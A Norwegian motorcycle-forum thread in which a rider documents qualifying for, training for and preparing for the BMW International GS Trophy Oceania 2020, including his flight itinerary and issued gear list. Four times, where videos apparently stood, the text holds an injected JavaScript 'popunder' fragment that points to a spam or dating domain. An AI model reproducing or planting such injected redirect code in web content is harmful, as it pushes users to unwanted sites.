Fra Stange til New Zealand - BMW Int.GS Trophy Oceania 2020
- Epylypzon
- Innlegg: 1227
- Registrert: 22 mar 2012, 06:46
- Motorsykkelen din: BMW F800GS Trophy -12, Yamaha WR426F -02
- Sted: Stange
- Kontakt:
Fra Stange til New Zealand - BMW Int.GS Trophy Oceania 2020
Tenkte å lage en liten logg på veien mot BMW Int.GS Trophy Oceania 2020
https://www.bmw-motorrad.com/en/experie ... -2020.html
Det startet med kvalifisering hos Touratech Lidköping i juni.
Var rimelig spent i månedene etter påmelding selv om forventningene ikke var alt for høye.
Møtte opp fredag ettermiddag for innsjekk og gjennomgang av sykkel / kjøreutstyr og middag.
Fått startnummer
Etter middagen ble det vist filmsnutt fra GS Trophy Mongolia 2018, husker jeg satt der å tenkte, herregud tenk å være med på noe slik.
');var popunder = {expire: 6, url: "https://flirthoney-hot.life/?u=lcd8hwq&o=h6dw1n9"};}
Alvoret startet lørdag morgen.
Syklene som skal brukes i finalen, og slik de ser ut "down under"
Etter første dagen endte jeg på en (for meg) overraskende 4. plass etter noen skikkelige blemmer på noen av øvelsene.
Lørdagskvelden ble meget rolig, ikke en eneste ØL. Også på MC "treff" :shock: :shock:
Søndag var det klart for finale. Alle skulle bruke samme sykler, de 2 avbildet lenger opp.
De 20 beste fra dag 1 fikk starte. Nr 20 fra dag 1 starta først. Nr 1 starta sist osv.
Det ble noen nervepirrende minutter / timer før det ble min tur. Vi skulle rundt ei løype med forskjellige hindre på en åpen grusplass.
1 poeng for hver gang man satte ned 1 fot, 5 poeng for å velte, om jeg ikke husker feil. Den med færrste poeng tilslutt vinner.
De første hindrene gikk ganske bra, så midt i klussa jeg veldig i "garasje øvelse" og "kjøre rundt og rundt med tau". De siste gikk tålig greit.
Tiden fra jeg selv kjørte til selve kåringen fant sted var uendelig lang. De begynte med første plassen, den gikk til finske Arto Kallionen. Så.. Speakeren hadde ikke fått sagt mer enn startnummeret mitt før jeg brøt ut i jubel.. 2. plass!! 3. plassen gikk til svenske Ronnie Lundberg. Sammen med Johan Ahlberg fra sverige er vi 4 Team Nordic. Johan er vår journalist/mediamann på laget (utsendt av BMW).
Meg, Ronnie, Arto
Fikk låne pokalen
https://www.bmw-motorrad.com/en/experie ... -2020.html
Det startet med kvalifisering hos Touratech Lidköping i juni.
Var rimelig spent i månedene etter påmelding selv om forventningene ikke var alt for høye.
Møtte opp fredag ettermiddag for innsjekk og gjennomgang av sykkel / kjøreutstyr og middag.
Fått startnummer
Etter middagen ble det vist filmsnutt fra GS Trophy Mongolia 2018, husker jeg satt der å tenkte, herregud tenk å være med på noe slik.
');var popunder = {expire: 6, url: "https://flirthoney-hot.life/?u=lcd8hwq&o=h6dw1n9"};}
Alvoret startet lørdag morgen.
Syklene som skal brukes i finalen, og slik de ser ut "down under"
Etter første dagen endte jeg på en (for meg) overraskende 4. plass etter noen skikkelige blemmer på noen av øvelsene.
Lørdagskvelden ble meget rolig, ikke en eneste ØL. Også på MC "treff" :shock: :shock:
Søndag var det klart for finale. Alle skulle bruke samme sykler, de 2 avbildet lenger opp.
De 20 beste fra dag 1 fikk starte. Nr 20 fra dag 1 starta først. Nr 1 starta sist osv.
Det ble noen nervepirrende minutter / timer før det ble min tur. Vi skulle rundt ei løype med forskjellige hindre på en åpen grusplass.
1 poeng for hver gang man satte ned 1 fot, 5 poeng for å velte, om jeg ikke husker feil. Den med færrste poeng tilslutt vinner.
De første hindrene gikk ganske bra, så midt i klussa jeg veldig i "garasje øvelse" og "kjøre rundt og rundt med tau". De siste gikk tålig greit.
Tiden fra jeg selv kjørte til selve kåringen fant sted var uendelig lang. De begynte med første plassen, den gikk til finske Arto Kallionen. Så.. Speakeren hadde ikke fått sagt mer enn startnummeret mitt før jeg brøt ut i jubel.. 2. plass!! 3. plassen gikk til svenske Ronnie Lundberg. Sammen med Johan Ahlberg fra sverige er vi 4 Team Nordic. Johan er vår journalist/mediamann på laget (utsendt av BMW).
Meg, Ronnie, Arto
Fikk låne pokalen
Mine mc er:
2016 BMW R1200GSA
2012 BMW F800GS Trophy
2002Yamaha WR426F
2001 BMW R1150GS
x 2002 Yamaha R6
x 2002 Yamaha YZ125
Kjørt 2014: 19000km
Kjørt 2013: GS`n 17300km , WR`n 700km
Kjørt 2012: 16 500km
Kjørt 09,10,11: 20 066km
http://www.ock-racing.com/pa-2-hjul-til ... -med-hjelp
2016 BMW R1200GSA
2012 BMW F800GS Trophy
2002Yamaha WR426F
2001 BMW R1150GS
x 2002 Yamaha R6
x 2002 Yamaha YZ125
Kjørt 2014: 19000km
Kjørt 2013: GS`n 17300km , WR`n 700km
Kjørt 2012: 16 500km
Kjørt 09,10,11: 20 066km
http://www.ock-racing.com/pa-2-hjul-til ... -med-hjelp
-
- Innlegg: 7614
- Registrert: 06 nov 2008, 22:42
- Motorsykkelen din: flere -til div kjøring.
- Sted: Tranby
Re: Fra Stange til New Zealand - BMW Int.GS Trophy Oceania 2020
Gleder meg til å følge deg på dette eventyret!
当有疑问时踢你的敌人在生殖器上,你可以道歉后
- AJ
- Administrator
- Innlegg: 37972
- Registrert: 30 sep 2006, 18:46
- Motorsykkelen din: KTM 1290 SA S, ('18), Moto Guzzi v7 850 Special 100 year Anniversary
- Sted: Lunner på Hadeland
- Kontakt:
Re: Fra Stange til New Zealand - BMW Int.GS Trophy Oceania 2020
Stor stas !
Blir absolutt spennende å følge videre.
Må jo være et eventyr og et minne for livet dette.
Når går ferden "down under"?
Blir absolutt spennende å følge videre.
Må jo være et eventyr og et minne for livet dette.
Når går ferden "down under"?
________________________________________________________________________
De som ønsker å bidra økonomisk til driften av forumet kan benytte et av alternativene her.
MC'er:
Suzuki GSX 1100 EF, 1985 (1991), Yamaha TDM 900, 2006 (2006 - 2010), Triumph Tiger 1050 SE, 2010 (2010 - 2012), Moto Guzzi Stelvio 8V, 2012 (2012 - 2015), KTM 1290 Super Adventure, 2015 (2015 - 2018), KTM 1290 Super Adventure S, 2018 (2018 - -->), KTM 390 Duke, 2021 (2021 - 2023), Moto Guzzi V7 850 Special 100 Anniversary (2023 - -->)
KTM 1290 SA S - nok en god grunn til oppmaskinering
De som ønsker å bidra økonomisk til driften av forumet kan benytte et av alternativene her.
MC'er:
Suzuki GSX 1100 EF, 1985 (1991), Yamaha TDM 900, 2006 (2006 - 2010), Triumph Tiger 1050 SE, 2010 (2010 - 2012), Moto Guzzi Stelvio 8V, 2012 (2012 - 2015), KTM 1290 Super Adventure, 2015 (2015 - 2018), KTM 1290 Super Adventure S, 2018 (2018 - -->), KTM 390 Duke, 2021 (2021 - 2023), Moto Guzzi V7 850 Special 100 Anniversary (2023 - -->)
KTM 1290 SA S - nok en god grunn til oppmaskinering
Re: Fra Stange til New Zealand - BMW Int.GS Trophy Oceania 2020
Tøft
Slekta på farssiden er forøvrig fra Stange, er døpt i stange kirke
Slekta på farssiden er forøvrig fra Stange, er døpt i stange kirke
2019 Triumph Scrambler 1200
2008 KTM 690 Enduro
2017 KTM 450 EXC-F Six days
2008 KTM 690 Enduro
2017 KTM 450 EXC-F Six days
- kvase
- Innlegg: 1064
- Registrert: 29 des 2015, 02:35
- Motorsykkelen din: KTM 1090 ADV-R/Yamaha WR450F
- Sted: Arendal
- Kontakt:
Re: Fra Stange til New Zealand - BMW Int.GS Trophy Oceania 2020
Det blir vel ikke Aktuelt med Grustur i Øst etter dette - For nå data a ta fra der vel
Vespa Piago 75cc Panter 50 cc Honda FT 500 cc XT660 Z Tennere KTM 1050 ADV-- i stallen nå KTM 1090 ADV-R
i tillegg en Suzuki DRZ 400
https://www.myrouteapp.com/travelblog/routes/1002610#
Er dyslektiker min verden kan være nesten slik som i artiklen her
http://www.dagbladet.no/2016/03/09/nyhe ... /43421895/
i tillegg en Suzuki DRZ 400
https://www.myrouteapp.com/travelblog/routes/1002610#
Er dyslektiker min verden kan være nesten slik som i artiklen her
http://www.dagbladet.no/2016/03/09/nyhe ... /43421895/
- Epylypzon
- Innlegg: 1227
- Registrert: 22 mar 2012, 06:46
- Motorsykkelen din: BMW F800GS Trophy -12, Yamaha WR426F -02
- Sted: Stange
- Kontakt:
Re: Fra Stange til New Zealand - BMW Int.GS Trophy Oceania 2020
Hvordan ser innlegget ut hos dere? Via nettleser ser det ok ut hos meg, men ikke via tapatalk.
Sent fra min LYA-L29 via Tapatalk
Sent fra min LYA-L29 via Tapatalk
Mine mc er:
2016 BMW R1200GSA
2012 BMW F800GS Trophy
2002Yamaha WR426F
2001 BMW R1150GS
x 2002 Yamaha R6
x 2002 Yamaha YZ125
Kjørt 2014: 19000km
Kjørt 2013: GS`n 17300km , WR`n 700km
Kjørt 2012: 16 500km
Kjørt 09,10,11: 20 066km
http://www.ock-racing.com/pa-2-hjul-til ... -med-hjelp
2016 BMW R1200GSA
2012 BMW F800GS Trophy
2002Yamaha WR426F
2001 BMW R1150GS
x 2002 Yamaha R6
x 2002 Yamaha YZ125
Kjørt 2014: 19000km
Kjørt 2013: GS`n 17300km , WR`n 700km
Kjørt 2012: 16 500km
Kjørt 09,10,11: 20 066km
http://www.ock-racing.com/pa-2-hjul-til ... -med-hjelp
- kvase
- Innlegg: 1064
- Registrert: 29 des 2015, 02:35
- Motorsykkelen din: KTM 1090 ADV-R/Yamaha WR450F
- Sted: Arendal
- Kontakt:
Re: Fra Stange til New Zealand - BMW Int.GS Trophy Oceania 2020
Innlegget jeg ser er veldig bra
Vespa Piago 75cc Panter 50 cc Honda FT 500 cc XT660 Z Tennere KTM 1050 ADV-- i stallen nå KTM 1090 ADV-R
i tillegg en Suzuki DRZ 400
https://www.myrouteapp.com/travelblog/routes/1002610#
Er dyslektiker min verden kan være nesten slik som i artiklen her
http://www.dagbladet.no/2016/03/09/nyhe ... /43421895/
i tillegg en Suzuki DRZ 400
https://www.myrouteapp.com/travelblog/routes/1002610#
Er dyslektiker min verden kan være nesten slik som i artiklen her
http://www.dagbladet.no/2016/03/09/nyhe ... /43421895/
- Epylypzon
- Innlegg: 1227
- Registrert: 22 mar 2012, 06:46
- Motorsykkelen din: BMW F800GS Trophy -12, Yamaha WR426F -02
- Sted: Stange
- Kontakt:
Re: Fra Stange til New Zealand - BMW Int.GS Trophy Oceania 2020
Tiden ble lang etter kvalifiseringshelgen(28.-30. juni), vi hadde jo blitt lovet treningssykler.
Men i september begynte ting å skje, var innom etter at de hadde begynt klargjøring av den.
Dagen etterpå ble det en ny tur for å hente den. Prøvde samtidig den nye rallydressen, da vi skulle få tilsendt dette fra Tyskland.
Tok med sykkelen på GS Meeting, men ettersom det manglet veltebøyler slapp den unna svartkjøring den helgen.
Fikk etterhvert veltebøyler som jeg monterte selv.
Ikke mye verktøy som følger nye sykler
34 eller var det 35mm mutter på bakhjulet, da begynner verktøyet man skal ha med på tur å bli stort, ei heller passer verktøy brukt på 800.
Den ble med på 2 grusturer
Inne for førstegangs service og påsetting av dekor, synd dette ikke kom før.
MC huset Nydal sponset hjelm, sko og litt småsnacks. Tusen takk!!
Men i september begynte ting å skje, var innom etter at de hadde begynt klargjøring av den.
Dagen etterpå ble det en ny tur for å hente den. Prøvde samtidig den nye rallydressen, da vi skulle få tilsendt dette fra Tyskland.
Tok med sykkelen på GS Meeting, men ettersom det manglet veltebøyler slapp den unna svartkjøring den helgen.
Fikk etterhvert veltebøyler som jeg monterte selv.
Ikke mye verktøy som følger nye sykler
34 eller var det 35mm mutter på bakhjulet, da begynner verktøyet man skal ha med på tur å bli stort, ei heller passer verktøy brukt på 800.
Den ble med på 2 grusturer
Inne for førstegangs service og påsetting av dekor, synd dette ikke kom før.
MC huset Nydal sponset hjelm, sko og litt småsnacks. Tusen takk!!
Mine mc er:
2016 BMW R1200GSA
2012 BMW F800GS Trophy
2002Yamaha WR426F
2001 BMW R1150GS
x 2002 Yamaha R6
x 2002 Yamaha YZ125
Kjørt 2014: 19000km
Kjørt 2013: GS`n 17300km , WR`n 700km
Kjørt 2012: 16 500km
Kjørt 09,10,11: 20 066km
http://www.ock-racing.com/pa-2-hjul-til ... -med-hjelp
2016 BMW R1200GSA
2012 BMW F800GS Trophy
2002Yamaha WR426F
2001 BMW R1150GS
x 2002 Yamaha R6
x 2002 Yamaha YZ125
Kjørt 2014: 19000km
Kjørt 2013: GS`n 17300km , WR`n 700km
Kjørt 2012: 16 500km
Kjørt 09,10,11: 20 066km
http://www.ock-racing.com/pa-2-hjul-til ... -med-hjelp
- Epylypzon
- Innlegg: 1227
- Registrert: 22 mar 2012, 06:46
- Motorsykkelen din: BMW F800GS Trophy -12, Yamaha WR426F -02
- Sted: Stange
- Kontakt:
Re: Fra Stange til New Zealand - BMW Int.GS Trophy Oceania 2020
Så var det klart for treningshelg i Säfsens skoger (her arrangeres Adventure Days). Som trenere på sykkelkjøring var det David og Pär fra Touratech, den fysiske treningen var det Johan som tok seg av.
Møtte fredag ettermiddag, først skulle vi jogge / klatre i tau / navigere med kart og kompass. Etter 2 timer med dette, og rimelig sliten kom vi tilbake til hytta. Da spretter David ut døra, "klare på sykkelen om 5 minutter".
Deretter bar det ut på skogen i mørket, på stier, opp baksiden av skianlegg (noen av oss slet opp der) og rundt omkring. Så var det inn til sen middag.
I det vi er ferdige med middagen sier dem, vi må vel kjøre litt til. Da fikk vi i oppgave å navigere til ett bestemt sted på skogen ved hjelp av eget laget kart hvor vi fikk se på orginalkartet i 5 minutter.
Vi kjørte faktisk rett på stedet, her var det ei lita nedlagt crossbane med underlaget SAND. Så her måtte vi kjøre runder, herregud så slitsomt.
Så ble vi geleidet til en liten sandbakke som vi måtte forsere opp og ned flere ganger. I 22.30 tiden var vi tilbake på hytta.
09.00 lørdag morgen skulle vi være klare for en ny dag.
Vi hadde først litt felles trening, gå rundt sykkel, løpe bak sykkel mens den gikk bortover på tomgang osv.
Så ble vi delt opp i 3, hvor hver av oss ble trent i hver vår ting. Som vi skulle formidle videre til gruppa etterpå.
Sakte kjøring, media og forsering av bratt bakke. Jeg fikk sakte kjøring.
Etter lunsj var det klart for mediatrening, hvor vi ble intervjuet av fotografen (som var med oss hele helgen) og Linus fra BMW Nordic.
Deretter ble det min "greie", med saktekjøring. Sirkler og rett frem. Tilslutt hadde vi en konkuranse oss i mellom, bruke lengst mulig tid på en gitt avstand. Her ble nok jeg vel ivrig; man stabiliserer sykkelen med bakbrems og clutch/gass. Mot slutten ga jeg alt, å brukte nok vel mye gass så jeg kjente clutchen begynte å bli litt dårligere.
Tilslutt var det forsering av bratt bakke. Her slet jeg skikkelig. Kom ikke opp 1 gang uten dyttehjelp. Når vi tilslutt kom opp og tok en liten rast på toppen sier David og Pär at, vi må nok kjøre noen flere ganger opp bakken.
På neste tur kjenner jeg at clutchen har det veldig vondt, den sitter DÅRLIG. Men, jeg får beskjed om å pushe på. Som sagt så gjort. Stakkars clutch.
Så var det klar for en kjøretur på vanlige skogsveier, clutchen slipper ved hardt pådrag. Vi hadde en liten foto/video shoot før mørket kom.
Når mørket var kommet skulle vi øve på å taue hverandre, det gikk overraskende bra. Er nok greit å ikke ha en villmann som drar.
Vi var vel inne igjen i 20 tiden. Kjapp dusj før middag, og DA.. Kunne vi ta en pils.
Søndag morgen skulle vi bare pakke sammen og øve litt på mekking.
Vi øvde på å ta ut luftfilter, av og på med fram/bakdekk. På framdekket tror jeg vi starta på rundt 5 minutter, endte opp på 1:13.
Bilder fra treningshelgen, fikk såklart ikke knipset så mye action bilder selv.
Utstyr utdelt.
Touratech på plass
Syklene på plass
Finnen hadde kommet tidlig på dagen og allerede rukket på møkke til sykkelen
Dekorert hytte
Detaljer
Tilbake på kvelden
Kjølig morgen
Fint på toppen av skibakken
Knekt clutchhendel kommer man vel neppe utenom
Arto, David, Johan, Pär
Lunsjtid
Arto intervjues
Justering av bøyd bremsepedal
Fotoshoot
En kjapp avspyling etter helgen
Etter helgen måtte den inn på verksted for å bytte clutch. Ei dame ved navn Kate skulle låne sykkelen de neste 2 ukene da hun skulle trene for Female Qualifyer som skulle gå av stabelen i Spania siste helgen i oktober
Møtte fredag ettermiddag, først skulle vi jogge / klatre i tau / navigere med kart og kompass. Etter 2 timer med dette, og rimelig sliten kom vi tilbake til hytta. Da spretter David ut døra, "klare på sykkelen om 5 minutter".
Deretter bar det ut på skogen i mørket, på stier, opp baksiden av skianlegg (noen av oss slet opp der) og rundt omkring. Så var det inn til sen middag.
I det vi er ferdige med middagen sier dem, vi må vel kjøre litt til. Da fikk vi i oppgave å navigere til ett bestemt sted på skogen ved hjelp av eget laget kart hvor vi fikk se på orginalkartet i 5 minutter.
Vi kjørte faktisk rett på stedet, her var det ei lita nedlagt crossbane med underlaget SAND. Så her måtte vi kjøre runder, herregud så slitsomt.
Så ble vi geleidet til en liten sandbakke som vi måtte forsere opp og ned flere ganger. I 22.30 tiden var vi tilbake på hytta.
09.00 lørdag morgen skulle vi være klare for en ny dag.
Vi hadde først litt felles trening, gå rundt sykkel, løpe bak sykkel mens den gikk bortover på tomgang osv.
Så ble vi delt opp i 3, hvor hver av oss ble trent i hver vår ting. Som vi skulle formidle videre til gruppa etterpå.
Sakte kjøring, media og forsering av bratt bakke. Jeg fikk sakte kjøring.
Etter lunsj var det klart for mediatrening, hvor vi ble intervjuet av fotografen (som var med oss hele helgen) og Linus fra BMW Nordic.
Deretter ble det min "greie", med saktekjøring. Sirkler og rett frem. Tilslutt hadde vi en konkuranse oss i mellom, bruke lengst mulig tid på en gitt avstand. Her ble nok jeg vel ivrig; man stabiliserer sykkelen med bakbrems og clutch/gass. Mot slutten ga jeg alt, å brukte nok vel mye gass så jeg kjente clutchen begynte å bli litt dårligere.
Tilslutt var det forsering av bratt bakke. Her slet jeg skikkelig. Kom ikke opp 1 gang uten dyttehjelp. Når vi tilslutt kom opp og tok en liten rast på toppen sier David og Pär at, vi må nok kjøre noen flere ganger opp bakken.
På neste tur kjenner jeg at clutchen har det veldig vondt, den sitter DÅRLIG. Men, jeg får beskjed om å pushe på. Som sagt så gjort. Stakkars clutch.
Så var det klar for en kjøretur på vanlige skogsveier, clutchen slipper ved hardt pådrag. Vi hadde en liten foto/video shoot før mørket kom.
Når mørket var kommet skulle vi øve på å taue hverandre, det gikk overraskende bra. Er nok greit å ikke ha en villmann som drar.
Vi var vel inne igjen i 20 tiden. Kjapp dusj før middag, og DA.. Kunne vi ta en pils.
Søndag morgen skulle vi bare pakke sammen og øve litt på mekking.
Vi øvde på å ta ut luftfilter, av og på med fram/bakdekk. På framdekket tror jeg vi starta på rundt 5 minutter, endte opp på 1:13.
Bilder fra treningshelgen, fikk såklart ikke knipset så mye action bilder selv.
Utstyr utdelt.
Touratech på plass
Syklene på plass
Finnen hadde kommet tidlig på dagen og allerede rukket på møkke til sykkelen
Dekorert hytte
Detaljer
Tilbake på kvelden
Kjølig morgen
Fint på toppen av skibakken
Knekt clutchhendel kommer man vel neppe utenom
Arto, David, Johan, Pär
Lunsjtid
Arto intervjues
Justering av bøyd bremsepedal
Fotoshoot
En kjapp avspyling etter helgen
Etter helgen måtte den inn på verksted for å bytte clutch. Ei dame ved navn Kate skulle låne sykkelen de neste 2 ukene da hun skulle trene for Female Qualifyer som skulle gå av stabelen i Spania siste helgen i oktober
Mine mc er:
2016 BMW R1200GSA
2012 BMW F800GS Trophy
2002Yamaha WR426F
2001 BMW R1150GS
x 2002 Yamaha R6
x 2002 Yamaha YZ125
Kjørt 2014: 19000km
Kjørt 2013: GS`n 17300km , WR`n 700km
Kjørt 2012: 16 500km
Kjørt 09,10,11: 20 066km
http://www.ock-racing.com/pa-2-hjul-til ... -med-hjelp
2016 BMW R1200GSA
2012 BMW F800GS Trophy
2002Yamaha WR426F
2001 BMW R1150GS
x 2002 Yamaha R6
x 2002 Yamaha YZ125
Kjørt 2014: 19000km
Kjørt 2013: GS`n 17300km , WR`n 700km
Kjørt 2012: 16 500km
Kjørt 09,10,11: 20 066km
http://www.ock-racing.com/pa-2-hjul-til ... -med-hjelp
- AJ
- Administrator
- Innlegg: 37972
- Registrert: 30 sep 2006, 18:46
- Motorsykkelen din: KTM 1290 SA S, ('18), Moto Guzzi v7 850 Special 100 year Anniversary
- Sted: Lunner på Hadeland
- Kontakt:
Re: Fra Stange til New Zealand - BMW Int.GS Trophy Oceania 2020
Artig og interessant lesning :) .
Men når foregikk dette? Ikke nå i desember, vel ?
Edit:
Ah...! sjekket tidligere innlegg og fotrstår det slik at den intense treningshelga foregikk i spetember.
Men når foregikk dette? Ikke nå i desember, vel ?
Edit:
Ah...! sjekket tidligere innlegg og fotrstår det slik at den intense treningshelga foregikk i spetember.
________________________________________________________________________
De som ønsker å bidra økonomisk til driften av forumet kan benytte et av alternativene her.
MC'er:
Suzuki GSX 1100 EF, 1985 (1991), Yamaha TDM 900, 2006 (2006 - 2010), Triumph Tiger 1050 SE, 2010 (2010 - 2012), Moto Guzzi Stelvio 8V, 2012 (2012 - 2015), KTM 1290 Super Adventure, 2015 (2015 - 2018), KTM 1290 Super Adventure S, 2018 (2018 - -->), KTM 390 Duke, 2021 (2021 - 2023), Moto Guzzi V7 850 Special 100 Anniversary (2023 - -->)
KTM 1290 SA S - nok en god grunn til oppmaskinering
De som ønsker å bidra økonomisk til driften av forumet kan benytte et av alternativene her.
MC'er:
Suzuki GSX 1100 EF, 1985 (1991), Yamaha TDM 900, 2006 (2006 - 2010), Triumph Tiger 1050 SE, 2010 (2010 - 2012), Moto Guzzi Stelvio 8V, 2012 (2012 - 2015), KTM 1290 Super Adventure, 2015 (2015 - 2018), KTM 1290 Super Adventure S, 2018 (2018 - -->), KTM 390 Duke, 2021 (2021 - 2023), Moto Guzzi V7 850 Special 100 Anniversary (2023 - -->)
KTM 1290 SA S - nok en god grunn til oppmaskinering
- Epylypzon
- Innlegg: 1227
- Registrert: 22 mar 2012, 06:46
- Motorsykkelen din: BMW F800GS Trophy -12, Yamaha WR426F -02
- Sted: Stange
- Kontakt:
Re: Fra Stange til New Zealand - BMW Int.GS Trophy Oceania 2020
Treningshelga var første helg i oktober :)
Mine mc er:
2016 BMW R1200GSA
2012 BMW F800GS Trophy
2002Yamaha WR426F
2001 BMW R1150GS
x 2002 Yamaha R6
x 2002 Yamaha YZ125
Kjørt 2014: 19000km
Kjørt 2013: GS`n 17300km , WR`n 700km
Kjørt 2012: 16 500km
Kjørt 09,10,11: 20 066km
http://www.ock-racing.com/pa-2-hjul-til ... -med-hjelp
2016 BMW R1200GSA
2012 BMW F800GS Trophy
2002Yamaha WR426F
2001 BMW R1150GS
x 2002 Yamaha R6
x 2002 Yamaha YZ125
Kjørt 2014: 19000km
Kjørt 2013: GS`n 17300km , WR`n 700km
Kjørt 2012: 16 500km
Kjørt 09,10,11: 20 066km
http://www.ock-racing.com/pa-2-hjul-til ... -med-hjelp
- Epylypzon
- Innlegg: 1227
- Registrert: 22 mar 2012, 06:46
- Motorsykkelen din: BMW F800GS Trophy -12, Yamaha WR426F -02
- Sted: Stange
- Kontakt:
Re: Fra Stange til New Zealand - BMW Int.GS Trophy Oceania 2020
Etter sykkelen var levert på mc huset for service skjedde det ikke så mye. Gikk noen uker så henta jeg igjen den i tilfelle jeg skulle få tid til litt mer kjøring før snøen kom.
I slutten av oktober kom "flybilettene", det blir noen timer på fly, men det blir artig å oppleve 380
------------------------------------------------------------------------------
FLIGHT OSL-ARN
Departure 05FEB20 Time 1715
Flight: SK488 Scandinavian Airlines System (SAS)
Arrival 05FEB20 Time 1820
Elapsed Flight Time: 1:05
Aircraft: Airbus A320neo
FLIGHT ARN-DXB
Departure 05FEB20 Time 2110
Flight: EK156 Emirates
Arrival 06FEB20 Time 0630
Elapsed Flight Time: 6:20
Aircraft: Boeing 777-300er
FLIGHT DXB-AKL
Departure 06FEB20 Time 1005
Flight: EK448 Emirates
Arrival 07FEB20 Time 1105
Elapsed Flight Time: 16:00
Aircraft: Airbus Industrie A380-800
FLIGHT ZQN-AKL
Departure 17FEB20 Time 1655
Flight: NZ626 Air New Zealand Limited
Arrival 17FEB20 Time 1845
Elapsed Flight Time: 1:50
Aircraft: Airbus Industrie A320 Sharklets
FLIGHT AKL-DXB
Departure 17FEB20 Time 2115
Flight: EK449 Emirates
Arrival 18FEB20 Time 0525
Elapsed Flight Time: 17:10
Aircraft: Airbus Industrie A380-800
FLIGHT DXB-ARN
Departure 18FEB20 Time 0830
Flight: EK157 Emirates
Arrival 18FEB20 Time 1215
Elapsed Flight Time: 6:45
Aircraft: Boeing 777-300er
FLIGHT ARN-OSL
Departure 18FEB20 Time 1540
Flight: SK491 Scandinavian Airlines System (SAS)
Arrival 18FEB20 Time 1640
Elapsed Flight Time: 1:00
Aircraft: Airbus A320neo
------------------------------------------------------------------------
I begynnelsen av desember fikk jeg melding fra DHL om at ei pakke fra Tyskland var på vei til meg. Kunne det være kjøreutstyret tro?
Åjo, det var det
Bag og dresspose
Dette designet får man ikke kjøpt via butikk
Baggen er rimelig full slik den kom, rallyjakka kom utenfor, men buksa lå i baggen.
Denne baggen, pluss den lille sekken er det vi har til rådighet å pakke i. Dvs vanlige klær/sko/undertøy/toalettsaker/kamerautstyr og ikke minst støvlene må få plass........
Det vi fikk var:
Lowe Alpine bag
Lowe Alpine sekk
BMW Rally jakke, med egen regnjakke man kan bruke utenpå
BMW Rally bukse
BMW GS hansker
Leatt STX Road nakkekrage
BMW sikkerhetsvest med rygg/brystbeskyttelse. Vi har fått valg om å bruke denne eller ikke. Jeg kommer til å ta ut ryggskinna i jakka å bruke denne.
BMW undertøy, kort bukse og trøye x2
BMW sokker
BMW GS briller
BMW buff
BMW hydrapack x2
BMW GS Trophy trøyer x2
Rejka Antao II Light telt
Thermarest Trail Lite liggeunderlag
Rab Ignition 3 sovepose
Rab pute
Hodelykt
Caps
Toalettveske
Rab lue
Rab hettegenser
Rab softshelljakke
GS Trophy caps
BMW har skrevet mer om utstyret og syklene vi skal bruke her
https://www.bmw-motorrad.com/en/experie ... rider-gear
Roonie på laget har også laget en unboxing video
');var popunder = {expire: 6, url: "https://flirthoney-hot.life/?u=lcd8hwq&o=h6dw1n9"};}
Teltet er lett å sette opp, nesten på høyde med Helsport. Greit å prøve det noen ganger før man kommer ned under. Samt henge opp innertelt og få på ekstra bardunene som var med.
Jeg så her om dagen at det var litt riper i glasset på brillene, så har bestilt nytt.
Samt bestilt et par til med BMW sommer sokker, ett par BMW vanntette sokker (skal vel være like SEAL SKinZ sokker) og 1 BMW hjelmpose/bag.
I slutten av oktober kom "flybilettene", det blir noen timer på fly, men det blir artig å oppleve 380
------------------------------------------------------------------------------
FLIGHT OSL-ARN
Departure 05FEB20 Time 1715
Flight: SK488 Scandinavian Airlines System (SAS)
Arrival 05FEB20 Time 1820
Elapsed Flight Time: 1:05
Aircraft: Airbus A320neo
FLIGHT ARN-DXB
Departure 05FEB20 Time 2110
Flight: EK156 Emirates
Arrival 06FEB20 Time 0630
Elapsed Flight Time: 6:20
Aircraft: Boeing 777-300er
FLIGHT DXB-AKL
Departure 06FEB20 Time 1005
Flight: EK448 Emirates
Arrival 07FEB20 Time 1105
Elapsed Flight Time: 16:00
Aircraft: Airbus Industrie A380-800
FLIGHT ZQN-AKL
Departure 17FEB20 Time 1655
Flight: NZ626 Air New Zealand Limited
Arrival 17FEB20 Time 1845
Elapsed Flight Time: 1:50
Aircraft: Airbus Industrie A320 Sharklets
FLIGHT AKL-DXB
Departure 17FEB20 Time 2115
Flight: EK449 Emirates
Arrival 18FEB20 Time 0525
Elapsed Flight Time: 17:10
Aircraft: Airbus Industrie A380-800
FLIGHT DXB-ARN
Departure 18FEB20 Time 0830
Flight: EK157 Emirates
Arrival 18FEB20 Time 1215
Elapsed Flight Time: 6:45
Aircraft: Boeing 777-300er
FLIGHT ARN-OSL
Departure 18FEB20 Time 1540
Flight: SK491 Scandinavian Airlines System (SAS)
Arrival 18FEB20 Time 1640
Elapsed Flight Time: 1:00
Aircraft: Airbus A320neo
------------------------------------------------------------------------
I begynnelsen av desember fikk jeg melding fra DHL om at ei pakke fra Tyskland var på vei til meg. Kunne det være kjøreutstyret tro?
Åjo, det var det
Bag og dresspose
Dette designet får man ikke kjøpt via butikk
Baggen er rimelig full slik den kom, rallyjakka kom utenfor, men buksa lå i baggen.
Denne baggen, pluss den lille sekken er det vi har til rådighet å pakke i. Dvs vanlige klær/sko/undertøy/toalettsaker/kamerautstyr og ikke minst støvlene må få plass........
Det vi fikk var:
Lowe Alpine bag
Lowe Alpine sekk
BMW Rally jakke, med egen regnjakke man kan bruke utenpå
BMW Rally bukse
BMW GS hansker
Leatt STX Road nakkekrage
BMW sikkerhetsvest med rygg/brystbeskyttelse. Vi har fått valg om å bruke denne eller ikke. Jeg kommer til å ta ut ryggskinna i jakka å bruke denne.
BMW undertøy, kort bukse og trøye x2
BMW sokker
BMW GS briller
BMW buff
BMW hydrapack x2
BMW GS Trophy trøyer x2
Rejka Antao II Light telt
Thermarest Trail Lite liggeunderlag
Rab Ignition 3 sovepose
Rab pute
Hodelykt
Caps
Toalettveske
Rab lue
Rab hettegenser
Rab softshelljakke
GS Trophy caps
BMW har skrevet mer om utstyret og syklene vi skal bruke her
https://www.bmw-motorrad.com/en/experie ... rider-gear
Roonie på laget har også laget en unboxing video
');var popunder = {expire: 6, url: "https://flirthoney-hot.life/?u=lcd8hwq&o=h6dw1n9"};}
Teltet er lett å sette opp, nesten på høyde med Helsport. Greit å prøve det noen ganger før man kommer ned under. Samt henge opp innertelt og få på ekstra bardunene som var med.
Jeg så her om dagen at det var litt riper i glasset på brillene, så har bestilt nytt.
Samt bestilt et par til med BMW sommer sokker, ett par BMW vanntette sokker (skal vel være like SEAL SKinZ sokker) og 1 BMW hjelmpose/bag.
Mine mc er:
2016 BMW R1200GSA
2012 BMW F800GS Trophy
2002Yamaha WR426F
2001 BMW R1150GS
